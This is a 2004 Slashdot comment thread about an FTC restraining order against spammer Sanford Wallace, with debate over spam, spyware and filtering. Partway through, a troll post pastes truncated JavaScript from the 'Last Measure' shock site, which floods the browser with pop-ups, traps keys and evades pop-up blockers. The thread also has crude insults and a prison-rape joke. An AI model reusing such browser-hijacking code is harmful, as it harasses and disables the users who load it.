Spamford Wallace Draws A Restraining Order
Steve Rock writes "According to an article in the Associated Press, a temporary restraining order has been issued by a judge against Stanford Wallace and his companies. The case marks the first anti-spyware action taken by the Federal Trade Commission, and while there is some argument about permitting unsolicited commercial e-mail because of free speech it appears a tougher approach will be taken with alleged spyware distribution."
I've got some great spam here on cheap legal services.
When will Gator and WhenU be similarily restrained?
You cannot fix social problems with legislation. Spam will never end as long as there will be fools who buy products advertised by unsolicited commercial e-mail. Period.
Sincerely,
Pan Tarhei Hosé, PhD.
"Homo sum et cogito ergo odi profanum vulgus et libido."
You can't fix a social problem with legislation. Spam won't as long as there will be idiots who buy products advertised by unsolicited email.
"Free speech" only applies to the extent that you have the right to speak freely, it does not extend to the point that you have a right to be heard, as you dont.. Nor does it allow that I have to pay to hear your "free speech".
Same reasons fax-Spam is illegal. It costs the recipient.
---- Booth was a patriot ----
"...while there is some argument about permitting unsolicited commercial e-mail because of free speech..."
Now that's a new one...
What if somebody argued that graffiti was free speech?
My point here is that nobody should legally be able to flood your email account with messages you don't want. It wastes the resources both of the systems across which the messages travel and of the people who have to go through them. In addition, it has been repeatedly shown in studies that unsolicited email is not an effective advertising strategy.
In summary, free speech is the right to express your views, not to shove them in someone's face without their permission.
Very original post, Mr. Fecal Troll Matter.
Do they even know that they're bad guys, or do they have themselves fooled?
Here's what I do: Bitty Browser & Andromeda
So when is Microsoft going to be prosecuted for forcing that spyware upon us called the Windows Update Mechanism? Yea...like that will ever happen.
With physical mailing systems like the USPS and Fedex, the bulk mailers have to pay to send you their printed spam. In the case of the private services, they are paying for the cost of sending and receiving the communication, and with the USPS not only are they paying postage, but they are paying taxes that subsidize the USPS. With physical spam, they are paying for it.
Online spammers, however, are not paying for their usage of my email server. Most of my email is delivered to my website's hosting service, which I pay a monthly fee for. Any spam that is sent to me costs me money in the form of infrastructure that my hosting service has to maintain to keep the QoS acceptable. They are thus, even if only indirectly, burdening me with part of their cost. We are not paying into a subsidized system.
At a minimum, I have a right to refuse all of their communications, and the only thing that keeps me from supporting massive litigation and regulation is the ineptitude of the legislatures to craft workable legislation that won't turn into another big lawyer feeding fest. Still, though, the Internet, unlike the USPS, is a totally private service, at least in the US. As such, if I choose to "censor" the spammers, that is my right as a paying user, especially since the government isn't doing it for me.
I think the solution to spamming might be to give a right of private action to infrastructure providers to fine the big guys for imposing cost on them. Seriously, let the hosting services and telecoms sue the pants off them for imposing the burden of supporting more bandwidth and hardware just to provide an adequate QoS.
And as for spyware, I think the best thing that could be done would be to amend the federal anti-cracking laws so that any software that is bundled that acts like spyware must inform the user on installation or the company that made it is guilty of federal anti-cracking law violations. Make every individual at Gator responsible, from the software developers to the CEO for criminal violations that could get them locked up for a few years if Gator as a corporation is found guilty.
Click here or a puppy gets stomped!
I have always considered seeing if one of the owners of a computer that was rendered unusable by spyware that I know would be interested in launching a civil suit. I would imagine that sneaking something onto someone's property and causing damage that could at least be measured in hundreds if not thousands of dollars would merit a court case.
_____
Thank you.
Really? Well, me personally, I'm not so sure what the problem with spyware. It's just another legitimate way of doing business. They did agree to the EULA allowing it after all, didn't they?
Take me for example. I sell preassembled computer systems. As part of the package I include a short, 83-page EULA that fires up when they first boot the system. After accepting the EULA (which they don't see until after I've cashed their cheque btw) I drop around to the customers house and install a series of automatic pop-up rock flingers in their front garden. At 3am the rock flingers pelt their bedroom windows with small rocks... generally not enough to break the glass, but I'm working on it. When they come out to see what the problem is, a hidden speaker blares out "Buy computer hardware from OverflowingBitBucket Inc!".
Thankfully the supplied EULA allows me to do this, so it's all legal. In fact, I'm anticipating an increase in business, as several customers have called me _personally_ and said they'll be dropping around to see me real soon now.
Adware and spam is a plague. Sometimes desperate measures are required to conquer a plague. Shut 'em all down. I'm sure they'll do just fine in another line of work....selling pre-owned cars, slamming consumers LD carriers, etc. Those industries seem to attract the same "quality" of individual.
Too bad we can't get a list of companies that pay for WhenU/Gator services so people could choose not to do business with them too.
I know FCM is a known troll and all, but he has a good point here. The reason spam continues is because it's profitable. If it wasn't, people would stop doing it. This is the same principle that makes the "War on Drugs" impossible to win.
The post you refer to is a copy of this one. So you're replying to the wrong guy.
You can't lie to google!
~~~
Free Flat Screen HERE!
People claim that Unix does not have spyware.
We do.
We just call them "rootshells".
There is not much difference between an app designed to steal your surfing habits and one designed to execute foriegn code.
Part of the total cost of 0wnership...
"Trademarks are the heraldry of the new feudalism."
Reformatted slightly to bypass lameness filter.
:( MSIE gets a special kind of last measure where I start off with a ModelessDialog and pop up from it. Gets around google toolbar. -- goat-see */
// fuck procreating like rabbits -- goat-see
<html>
<head>
<meta name="generator" content=
"HTML Tidy for Linux/x86 (vers 1st November 2003), see www.w3.org">
<title>Our lawyer has informed us that we need a warning. So, if
you are under the age of 18 or find this offensive, please leave
immediately</title>
<script language="JavaScript" type="text/javascript">
window.name = 'lastmeasure';
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function delkey() { if (event.keyCode == 46) alert("LAST MEASURE VERSION 3.3 BY PENISBIRD.\nStarring:\nSpin\nTubgirl\nLemonparty\n Bob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nAdditional (actually fucking working in v3.2) popup-blocker-busting by goat-see\nhey.swf by rkz\nPROPS TO GNAA"); }
var xOff = 5; var yOff = 5; var xPos = 400; var yPos = -100; var flagRun = 1; var goat = 0;
/* let's figure out what the fuck kind of browser the poor plebs are using
var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);
var is_ie = (agt.indexOf("msie") != -1);
var is_ie4up = (is_ie && (is_major >= 4));
var is_nav = (nom.indexOf('netscape')!=-1);
var is_nav4 = (is_nav && (is_major == 4));
var is_mac = (agt.indexOf("mac")!=-1);
var is_gecko = (agt.indexOf('gecko') != -1);
// GECKO REVISION
var is_rev=0
if (is_gecko) {
temp = agt.split("rv:")
is_rev = parseFloat(temp[1])
}
function procreate(){
if(window.opener) {return 0;}
window.setInterval("procreate();", 1);
goat = Math.ceil((Math.random()*10));
if(goat == 1|| is_ie) {popUp("christmas.php");}
if(goat == 2|| is_ie) {popUp("lemonparty.php");}
if(goat == 3|| is_ie) {popUp("penisbird.php");}
if(goat == 4|| is_ie) {popUp("pillowfight.php");}
if(goat == 5|| is_ie) {popUp("tubgirl.php");}
if(goat == 6|| is_ie) {popUp("spin.php");}
if(goat == 7|| is_ie) {popUp("freak.php");}
if(goat == 8|| is_ie) {popUp("rustina.php");}
if(goat == 9|| is_ie) {popUp("loopback.php");}
if(goat == 10|| is_ie) {popUp("eww.php")}
}
function newXlt(){ xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; window.focus()}
function newXrt(){ xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; }
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function newYdn(){ yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; }
function fOff(){ flagrun = 0; }
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,men ubar=0,resizable=0,width=640,height=583');");
}
function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){ newXlt(); }
if (xPos < 0){ newXrt(); }
if (yPos > screen.height-100){ newYup(); }
if (yPos < 0){ newYdn(); }
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
</script>
</hea d>
<body background="http://img14.imageshack.us/img14/383/h ello4.jpg
" bgcolor="#FFFFFF" onfocus = "if(is_ie) {showModeless
Nobody reads it. In essence, it's an end-run around the legal system.
The thing is most spyware installs itself *without* you knowing...
off topic??? parent described the granparent troll link!!!
Spamming is *** FUCKING TRESPASSING ***, it is *** THEFT OF COMPUTER RESSOURCES THAT DO NOT BELONG TO THE SPAMMER ***, it simply boils down to *** PROPERTY RIGHTS, NAMELY THE RIGHT OF A NETWORK OWNER NOT TO HAVE HIS COMPUTER RESSOURCES STOLEN BY A GODDAMMED FUCKING SONOVABITCH SPAMMER ***.
What part of *** MY OWN GODDAMMED FUCKING NETWORK, MY OWN GODDAMMED FUCKING RULES *** don't you understand???"Spyware" describes a broad category of software that can be installed through unsafe e-mails or Web pages. It sometimes is bundled with other software that consumers download and install, such as file-sharing programs that can be used to download music and movies illegally.
That statement makes it appears as if only people doing illegal things are at risk from spyware. If that were the case, then I doubt that this kind of government response would be such news.
The article's journalist might have done better to include seemingly innocuous software as a possible source of spyware, including stock ticker, weather monitors, automatic desktop wallpaper changers, and so on.
spam is not the issue, it's the damn idiots who don't protect their 'puters' from being Zombied. The proliferation of high speed internet is the contributing issue in Spam, but, not to sound to much like a zealot, it's the unedgumacated people with that brand new $400 HP from 'Bestbuy' with the 3 years of AOHell Broadband, that are the real issue.
;)
Now I hate Spam as much as the next geek but the facts of the matter are that there is no way to prevent Spam unless
a) People are educated, and are shown the errors of their actions, IE: if they respond to spam, beat them to a pulp,
b) Teach them that all free software is not a 'must have thing'
c) Have a professional setup their brand new super duper, Wintel revenue generator, ehem... I mean computer, and a resonable firewall.
Just to make another point, is it all bad for the internet, to have the M$ Monolith, start to get on the security band wagon. If their shitty little firewall app, can stop just some of these script kiddies, then I thinks is great. That's the 1st step, prevent the new or unedgumacated from doing harm to themselves, and ultimatly to me, and keeps down the useless traffice so I can get better download times on my porn
Umm, legislation is pretty much the *only* way to fix social problems.
Just like any other form of fraud, you can't eliminate it completely, but you can certainly slow it down.
Spam will never end as long as there will be fools who buy products advertised by unsolicited commercial e-mail.
No, spam will never end as long as there are fools who *THINK* that people will buy products advertised via spam.
The spammers making money *aren't* doing so by selling products, they are making money by getting fools who have products to pay them to spam.
Looks like they've suckered you into believing their lies.
It's all in how you define "bad", and your own personal moral compass.
Take me, for example : Despite a sense of outrage at the way the world runs, it seems people consider me to be a little too moral. Hell, I know I do - I could never deliberately hurt a friend, and when I do accidently, it causes me great guilt. Hell, I still feel guilty over minor little incidents that involved nobody else! when I was a kid.
However, there's a guy here in Australia who's currently in the news because of a share "scam" - basically, he's sending letters to small shareholders, little old ladies and men etc, offering to buy their share parcels at considerably below their value. People seem to find this reprehensible...
Now I could quite happily do that, and not feel a twinge of guilt. Don't ask me why, I just wouldn't - maybe it's because I feel very strongly that one should be aware of these things, and make decisions accordingly.
Or, maybe I'm just one very fscked-up person. That's a possibility too...
What part of "a well regulated militia" do you not understand?
The pure food and drug act of 190x, was passed in response to the patent medicines that were being sold, usually containing narcotics, or other unknown, or even harmful ingredients.
Food and medicine products have since had the ingredients lists.
The situations seems very similar, with the software not being what it was sold as, or totally ineffective.
-jhines
"...file-sharing programs that can be used to download music and movies illegally."
Sharing files is officially illegal.
Ignorance is curable, stupid is forever.
Taken a sociology class lately? Almost every problem is a social problem. Crime is a social problem. Poverty is a social problem. Discrimination is a social problem. But we still create laws against crime, welfare programs, and anti-discrimination laws, even though we know we'll never eliminate these problems. Legislation can never completely solve social problems, but if enacted and enforced well, it can reduce them. Not by stopping each and every spammer or malware creater on the planet, but by taking out the big fish and keeping the small fry intimidated enough that they never grow too big.
Interestingly, I noted a significant decrease (75 percent, roughly) in SPAM for a week or so after the series of hurricanes disrupted power et al in Florida. What's that stat, something like 90 percent of spam sources from one or two people in Florida?
If a hurricane can do it, so can a jail cell.
Ignorance is curable, stupid is forever.
Take me for example. I sell preassembled computer systems. As part of the package I include a short, 83-page EULA that fires up when they first boot the system. After accepting the EULA (which they don't see until after I've cashed their cheque btw) I drop around to the customers house and install a series of automatic pop-up rock flingers in their front garden. At 3am the rock flingers pelt their bedroom windows with small rocks... generally not enough to break the glass, but I'm working on it. When they come out to see what the problem is, a hidden speaker blares out "Buy computer hardware from OverflowingBitBucket Inc!".
I need a new computer, can you show me a price list?
The thing is most spyware installs itself *without* you knowing...
Funny you should mention that. I've been thinking about branching out into a lawn-mowing service. The plan is to offer free quotes, all the customer has to do is send me their address. When they do, after dropping around and giving them a quote (I am a legitimate business after all), I come back later that evening and install the pop-up rock flingers anyway. I just have to come up with a suitable message for the hidden speaker for this market. I'm thinking something like:
"Buy computer hardware from OverflowingBitBucket Inc! OverflowingBitBucket Inc. is a legitimate business. You have been added to out rock-flinging list by some unspecified action you might have performed in the past. If you would like to to opt-out of future rock-flingings, please write a letter to our office in Heremettica."
Of course I don't actually _have_ an office in Heremettica, since I just made up that name then. But that's okay, I don't plan to respond to any mails there anyway.
I need a new computer, can you show me a price list?
You need a new computer? That's great! Price lists are so 1990s btw. Just spec out the machine, give me your bank account details, and I'll draw out the appropriate amount from your account. I can then send you the legals, and if you accept them I will send you your shiny new PC!
Can I interest you in a free quote on lawn-mowing?
The problem with spam is that it's so cheap to send and will get SOME results - if I send 3 million spams and one in every hundred thousand people responds, I'm doing ok. This guy was even worse though, infecting 'puters with spyware and then selling the remedy - why didn't I think of that...
Pay no attention to that man behind the curtain.
These people should be next:
eXact Advertising, LLC
If you do a spyware search on most computers, this will be one of the top companies whose software is installed. They used to be hosted with Corsis Technologies, but it looks like they moved...
Could someone kindly tell me why people do this?
It seems like a lot of hard work was put into getting this "right", and the end result is a stupid form of perverse cruelty.
Surely we have better things to do with our lives than this sort of thing.
Viewing this kind of stuff in the privacy of your own home is just fine. Foisting it on unsuspecting people, and going to a lot of trouble to prevent them from closing the windows, is, well, sick.
Why do it?
D
I posted the source (I like to check these links out with wget), and can't imagine the motivation. Guess there's some kind of juvenile pleasure in it, and we can only hope they're kids and will grow out of it.
Well said!
That I why I use a technological solution.
I wrote it. I use it. It works!
Before I wrote it, I was ready to *SCREAM* in frustration at all the useless spam I got at a webmail address from 'manual spammers' who read that address off a website image I used to have and 'spammed away'. That is why I never gave out my POP3-enabled email address because I knew I could code a POP3-based solution that could filter the spammers out for good!
I was successful!
Nowadays, the only time I get spam is on two occasions:
1) When I have my software temporarily disabled in order to get expected, important, one-time emails such as a website login passwords. Once I get such emails, I immediately re-enable the software and have effectively 100% spam protection again!
2) The spammers send me a 'Subject line:' spam with an email body with zero content--nothing but the terminating period per the email RFC specification. A pathetic act of desparation. Should enough of them get through to be a bother, I can slightly recode my software to add the subject line contents to the filtering routine and block spam at this level as well! I could even add an effective dictionary-based filtering technique that was used in the very first version of my software to filter out the last bit of 'subject line' spam from spammers who just cannot give up!
For any spammers out there who might be reading this, please remove iamcf13@hotpop.com from your lists. You are wasting your time sending me any email that has any of the 8 telltale signs of spam in it.
It is *impossible* for you to send me *any* kind of commercial email without using one or more of of the 8 telltale signs of spam!
Game Over, Spammers/Computer Crackers!
http://www.theunionleader.com/articles_showa.html? article=45988
Because it points out his address.
That's a good idea, I will. I'll also tell them to forward it to everybody they know, to spread the message. Thanks!
Sincerely,
Pan Tarhei Hosé, PhD.
"Homo sum et cogito ergo odi profanum vulgus et libido."
His name is Sanford Wallace. No "t".
Tom Geller
Your solution is to spam slashdot with adds for your overly-restrictive, simplistic mail filter?
Go home.
So why doesn't he?
Good, inexpensive web hosting
I hope you don't write your emails in the same way as you write your posts, because this one surely looks like spam.
The founding fathers would probably have frowned at the suggestion that someone had a right to walk up on your porch, take your stack of paper, your quill, and start writing whatever they wanted on it and post it to your house, in the name of "free speech".
As usual, their rights end where they intrude on yours.
Of course, they can stand in the road and talk all they want (to the extent that they're not disturbing the peace), but that's a website, not spam.
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
First off, you're bidding against guys in India and parts of Eastern Europe where $200 is a month's rent. The buyers are well aware of this and drive the price down to far beyond minimum wage. I've done a couple projects which equate to cents on the hour, but again, food on the table.
Cents per hour? Are you nuts? WalMart is paying $9.50/hr for a cashier.
For each cent you're making you're costing everybody else hundreds.
Write some open source in the evenings to keep your resume hot and you'll have a real contracting job soon enough.
The problem is what you're doing is not a scalable behavior. As yourself, "what if everybody did what I'm doing?" Think that through and you'll see your behavior is not ethical.
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Fuck that.
As soon as Sanford Wallace is being sodomized by Kobe Bryant on live TV at halftime during game 6 of the World Series (or, failing that, simply being punched in the face for a solid 40 minutes by a meth-crazed Mike Tyson) then call me. Otherwise, I don't want to read any more spam stories.
(And yes, I realise that some of my Euro brethren will respond with the usual "prison rape isn't funny!" horseshit that they normally do, so let me append my usual disclaimer... prison rape isn't funny - unless it's a spammer's colon being rended asunder. Then, it's goddamned hilarious.)
Message ends.
That is, until you get sued by several spammers and have to spend lots of money on a lawyer to defend yourself. Can you afford the legal costs even if you win? By making this stuff illegal, these laws remove the ability of spammers to sue people who make and use such solutions. While the Can Spam act wasn't that good, at least it provided a legal shield to people who develop and use those technological solutions you are so fond of.
Wishful thinking
This is true. But spam is not a social problem. It's simply trespassing. The problem here is simply that the law is too behind the times to see that, and thus it isn't treated as such. It's a property-rights issue, simply put. Spammers are tresspassers and thieves, and should be treated as such.
Idiots who buy from spammers are a big problem, certainly. And if we could magically banish such idiots from the net, that would be great. But their actions, while stupid, are not criminal.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
I remember reading a while back about how Sanford Wallace gave up spamming and bought a nightclub in New Hampshire. Here's a wired story that takes about that:
0 .html
http://www.wired.com/news/business/0,1367,60714,0
When I go to the homepage for Club Plum Crazy at http://www.clubplumcrazy.com/ -- I see that it is closed until further notice.
I guess DJ MasterWeb couldn't give up his old spamalicious ways, and has gone back to the crooked lifestyle, this time with spyware. What a shame.
Unfortunately, 'spreading the message' of the Boulder Pledge via email could be construed as 'mass mailings' even though it is not commercial in nature.
/. succumb to these blatant types of advertising. If the article was submitted by a non-Wired affiliated person ... I might have read it. At least some other Slash-Advertisers post anonymously. pfft.
Perhaps it is best to post the Boulder Pledge to your website or as the signature to your emails.
This is why I cannot use unsolicited spam emails to 'spread the word' about my antispam software---the ends wouldn't justify the means.
So my simple, effective approach languishes in obscurity while bigger, more complicated, CPU-intensive approaches are featured on Slashdot.
My approach lets *YOU* decide what kinds of content you want in your email while the other approaches I've seen here use complicated rules to try to flag an email as spam or not.
In an earlier post, I describe the merits of my software in an enthusiastic, factual manner.
For that, this was the result:
[block quoted section below]
MOD SPAMMING PARENT DOWN (Score:0)
by Anonymous Coward on Saturday October 23, @11:06PM (#10612183)
Your solution is to spam slashdot with adds for your overly-restrictive, simplistic mail filter?
Go home.
[ Reply to This | Parent ]
Re:Spam is a social problem--my solution (Score:0)
by Anonymous Coward on Saturday October 23, @11:35PM (#10612297)
I hope you don't write your emails in the same way as you write your posts, because this one surely looks like spam.
[ Reply to This | Parent ]
[block quoted section above]
Why then was the following news item posted to Slashdot in the first place?...
[block quoted section below]
The Long Tail
Posted by michael on Tue Oct 05, '04 04:25 PM
from the something-for-everyone dept.
Chris Anderson writes "I'm the editor of Wired Magazine and if you'll forgive the autohornblowing, I think you'll be interested in my piece in our latest issue. It argues, with a lot of new data, that the entertainment industry is shifting from an era of hit-driven economics to one of niche-driven economics. Content that was once relegated to the fringe, beneath the threshold of commercial viability, is now increasingly able to find a market in distributed audiences, marking a shift towards the previously-neglected Long Tail of the demand curve."
[block quoted section above]
Why is it all right for Chris Anderson to talk about his ideas for free on Slashdot in the form of a news story and not I?
Some selected posts from that thread that address this issue:
[block quoted section below]
Re:autohornblowing (Score:0)
by Anonymous Coward on Tuesday October 05, @04:36PM (#10444135)
if the Slashdot invoice for this publicity is 0$, then I'm even more impressed by the autohornblowing.
[ Parent ]
Why? (Score:0, Flamebait)
by jmays (450770) on Tuesday October 05, @04:29PM (#10444034)
Why does
Re:Why? (Score:3, Insightful)
by halfelven (207781) on Tuesday October 05, @04:59PM (#10444377)
(http://florin.myip
"Food on the table," always the refuge of those breaking the law that think it's ok. Of course, it seems that usually "food on the table" means "Quality food on the nice teak dining set in my tastefully appointed 3 bedroom house in a good neighbourhood with a new Audi and Subaru parked out front."
To quote Chris Rock: "Please cut the fucking shit."
There are many, millions in fact, people in this nation that put food on the table and sustain themselves doing menial jobs, often for minimum wage. I've done that before. There are plenty of low level jobs doing construction, washing dishes, etc out there. If you need work to feed yourself, it is always available. For that matter, there are plenty of social services available that will get you fed as well.
So let's not play this game. You got out of a job, probably because your ethics are in the shiiter and you aren't very good at what you do. I mean who wants to hire someone who has crappy work eithic and general eithics where it's ok to break the law so long as it puts them ahead?
So you turn to spam, something which was clearly immoral and receantly became illegal. Why? Not because you need to eat, as I said, there is ample oppertunity out there to get shit work that'll give you money enoug to get food and shelter, but becuase you think you're special, and deserve more. You seem to think that you ahve a right to make lots of money doing computer shit and if you can't do it legally, well than dammit doing it illegaly is justified.
Give it up, you have no moral high ground here.
The really funny thing is I know many people in It who are in a position where they hire other people. Nearly all of them are looking for people to hire, that's right, they want to give more people a job. The problem is, they can't find people qualified for the job. They find many people who's skills just aren't up to their talk.
So get off it. Also, you might want to update your homepage, if you truly are in the grips of unemployment. Gabbing about how spam is what you must do to put food on the table while proclaiming to have employent with a large chain on your page doesn't help your stance.
He may be an adequate programmer, but how is it that companies the country over have good paying jobs for programmers paying upwards of 60K/year and this guy is working for pennies on the dollar. We just hired a bunch of people to do coding, and I know we are competing against other companies looking for good, competent programmers.
Thinking through this clearly you are faced with a couple things:
1) He is unemployable because he takes drugs or has a criminal record
2) He smells or looks so bad that he can't get hired
3) He lives in a place that has no technical jobs.
4) He isn't that good of a programmer
5) All of the above
(Now before you dismiss #4, think of how poorly most of these spyware things are coded and how much havoc they wreak on a PC, you'll come to the same conclusion).
But if somebody was a normal, competent programmer, why would they work for $20 a week? The grocery checkout people in the city here make $30K/year.
Maybe he's just a bullshit artist.
It's all about the benjamins baby.
Ok, yeah... people are greedy.
But they are all in the same line of business!!!
Why would they hurt each other?
But, at least it's a powerful object lesson on the subject of SPAM!
What is the deal? you think you are somebody because you can "call" yourself a programmer? Before I work for $40 for 80 hours. I'll go down and get a job at Micky Dee's and ask "Will you take fries with that." I have more respect for a person like that. At least they make a honest living and make a hell of a lot more money than you do.
Yes you are to blame. You and every cheap whore like yourself.
Where is your reasoning??? You are commiting a crime and NOT making any money at it. we all can see that you ARE too lazy to go and get a real job.
I too work freelance and have been approched to do some shady things. I would rather go and rake leaves out of somebody's yard first to make the bills (which I have before). At least that is a honest living.
Even had a spamming operation one time offer me 20 times our normal hosting fee to co-host their servers. Did I? HELL NO! Maybe I should have been the "Normal" American business man and took the money and run but my honor is pricless. In other words you don't have enogh money to buy it. From what you had to say your honor is only worth about $0.05 per hour. I ask what kind of human being are you??? OH! just another American business person I suppose....
You complain about what your corporate boss was paying you but you had to be at least making minium wage doing what you were doing. This would be about 30 times more than you are making now so how can you say you weren't making money at that job? You where making more then than you are now.
I think you problem about getting a decent job is more about your attiude. Look at what you said. Even when a spammer hires you. You write shitty code. See you can't even do that job right. Even if you think you can justify it. When I take a job I do it right. If I don't agree with what the work entails then I don't take the job. Very simple logic. Would I hire you??? HELL NO!
Somebody should take you out back and beat some sense into your head with a 2X4.
BTW there are no rewards for idiots like you and just when did you do the "right" thing????
Oh yea how about a BJ? I think I have a dime!
Bio. Spamford didn't start his life of evil selling spyware. He got his nickname from being one of the early big spammers, but he'd been evil before that. The reason you don't get inundated with junk faxes is that Spamford was also one of the early big junk faxers, and this annoyed enough people that Congress made a law against it. It hasn't gone away entirely, but it's at least a relatively well-defined problem, and the economics at the time were such that a law could make it relatively uneconomical.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Legislation is too easy to avoid, since the Internet lets you work from everywhere in the world - it can only work if it changes the fundamental economics, and they're hard to change. Technology is an arms race, and it also works for everybody if it changes the economics, but it can also work for _you_ if it cuts down the amount of spam that you actually see, as opposed to the amount of spam that spammers attempt to send to you. One big problem with technological solutions is that it's hard not to interfere with real email, and false positives are really annoying.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
So to sum the very long beginning of your post: "Other people spam on slashdot too, so there's nothing wrong with spam"?
So my simple, effective approach languishes in obscurity while bigger, more complicated, CPU-intensive approaches are featured on Slashdot.
My approach lets *YOU* decide what kinds of content you want in your email while the other approaches I've seen here use complicated rules to try to flag an email as spam or not.
Or possibly your approach languishes because people aren't interested in an approach with a staggering potential for false positives in identifying spam? You say that other systems have 'complicated rules' like that's a bad thing--they are complicated in an attempt to actually separate spam from ham intelligently. It's not like there is some conspiracy to promote other solutions over yours.
It's nice that your approach works for you, but for the incredibly large portion of the population that occasionally recieves legitimate emails with attachments, html, or % or $ signs, it's worthless compared to most of the other spam filtering approaches.
So my simple, effective approach languishes in obscurity while bigger, more complicated, CPU-intensive approaches are featured on Slashdot.
My approach lets *YOU* decide what kinds of content you want in your email while the other approaches I've seen here use complicated rules to try to flag an email as spam or not.
I should add that I don't see anything new in "your" approach. It sounds like a very simple version of the non-learning setup of spamassassin, which:
The only difference I see is that instead of using 8 very broad rules, spamassassin uses hundreds, and the point values are configurable so that anyone can tailor the scores to correspond to their spam/ham experience patterns.
So how is your solution, which seems to be equivalent to a rigid and narrowly defined spamassassin configuration (which happens to work for you, but not in a more general usage case)?
Whoops, missed the last word. That should read: "How is your solution, ..., better?
(for those of you who haven't figured this out, I'm speaking this as devil's advocate, not someone who agrees with him).
Free Software: Like love, it grows best when given away.
But at least you have skills and a work ethic. I don't even qualify for freelance jobs except for $20 homework problems on Rentacoder, nor do I have the perseverance to make 100s of bids a day. I don't think I have the skills for McDonald's, either, considering how much trouble I have just preparing a frozen dinner, folding my clothes, or washing dishes.
I admit that I've thought briefly about the spam business. I personally don't mind spam all that much. At one point it filled up my secondary email accounts and threatened to swamp my main account, but now that the free spam filters I use have been very effective, the memory is fading. -- Eileen
much like why I've written a mass spammer on my local network.
To (a) see if it can be done, and (b) use it to demonstrate that there really is a problem.
I mean, popups _are_ a problem. Some of the browsers would not have had anti-popup magic added to them if it wasn't the case. You can thank the abusers of the system for the (partial) solution to the problem.
And, for the spam mailer - it really is a tricky problem. Its easy to write a multiplexed mailer which takes a list of email addresses, a list of pre-resolved MX IPs for each domain and send a piece of mail to each. The trick is doing it in such a way as to not kill the remote host(s). I learnt a _lot_ about how very very large SMTP mailers work and I have a lot of respect for hotmail/aol/yahoo/google from it.
So what's wrong with that? I photograph anyone wearing anything... or nothing. I see nothing wrong with ta nude human body.
(of normal weight distribution mind you- I've seen some very scary ones while walking around the mall...)
That's actually a good answer, but I doubt that you'd put deceptive links in your postings to get people to use your spam engine!
:-(. You said why people might write it but not why they'd disseminate it in the destructive fashion in which they do.
So no, you didn't answer my question at all
D
Or possibly your approach languishes because people aren't interested in an approach with a staggering potential for false positives in identifying spam?
My software can be configured to allow all sorts of 'spammy' content through. At least such content is 'defanged' to prevent malware via HTML and file attachments from compromising one's PC outright. Can the same be said of the other spam filters? The other ones I know about cut away file attachments with 'runnable' extentions and probably do not 'neutralize' unsafe HTML like my software does. Since it has been posited (established?) that computer crackers are working with spammers to set up 'zombie relays' via infected email file attachments or exploit-laden HTML pages sent by email, why not deny them those avenue of attack while still allowing such email to flow unimpeded but in a benign, inert state? In this manner, the user must consciously compromise their system by making such content hostile again which is easy to do.
You say that other systems have 'complicated rules' like that's a bad thing--they are complicated in an attempt to actually separate spam from ham intelligently.
But how can you do that effectively if the sp4mm3rs 4r3 c0nst4nt1y m1ssp31ling w0rds in an effort to evade word-based pattern matching algorithms? My approach is immune to such chicanery because the content I 'score' on is the only content that really matters when looking for spam or 'spamlike' content--all other content is irrelevant and is used by spammers/crackers to get their content past filters and into your mailbox. The way I see it, someone sending you unsolicited email for the very first time have absolutely no need to send you file attachments, HTML (looking content), quoted printable (looking) content, percent signs, dollar signs, numbers, URLs (or URL-like content), or email addresses (or email address-like content). If they do, the email they sent you is likely spam. In my case, that fact was borne out as when the filtering on my public email address, iamcf13@hotpop.com, was a little less restrictive, I still got spam and the occasional Nigerian '419' advance fee fraud email that didn't use percent signs or dollar signs in their fraudulent content. Fed up with even getting this trickle of spam and fraud, I set my SpamByte code to 0 and filtered out effectively all my spam! Right now, I rarely get an occasional 'Subject line' spam with a zero-content body. I have concluded for the time being that these are sent 'manually' out of spite by the spammers and are not 'standard' spam with it's convenient links to 'spamvertised sites' and whatnot.
It's not like there is some conspiracy to promote other solutions over yours.
Allow the Slashdot story editors to 'speak for themselves'.
Since 2004-07-15, the following antispam software packages/algorithms got a news story about them on Slashdot:
DSPAM v3.2 Released
DSPAM v3.2 Beta-1 Released
SpamAssassin 3.0 Released
Revolutionary Spam Firewall Developed
My shareware mailserver had built-in 'antispam firewall' support at the TCP/IP connection level since Thursday, July 15, 2004, 22:19 Universal Coordinated Time
Fighting Spam with DNA Sequencing Algorithms
The above software all use sophisticated numerical and pattern matching algorithms in order to indentify spam from other legitimate email. I say it is unecessar
But how can you do that effectively if the sp4mm3rs 4r3 c0nst4nt1y m1ssp31ling w0rds in an effort to evade word-based pattern matching algorithms? My approach is immune to such chicanery because the content I 'score' on is the only content that really matters when looking for spam or 'spamlike' content--all other content is irrelevant and is used by spammers/crackers to get their content past filters and into your mailbox.
Read my other follow-up post. Other solutions, like spamassassin, can use a *wide* variety of rules, such as amount of html, amount of html to plaintext, amount of picture content to text content, general characteristics of text (all caps, etc.), and others that have *nothing* to do with spelling of words. Matching certain phrases is a) optional and b) on top of more general rules. I use an out-of-the-box, non-learning spamassassin installation and have had incredibly good results, whereas I can think of many good emails that would have been deleted at your higher settings, and many bad ones that would have gotten through on the lower setting.
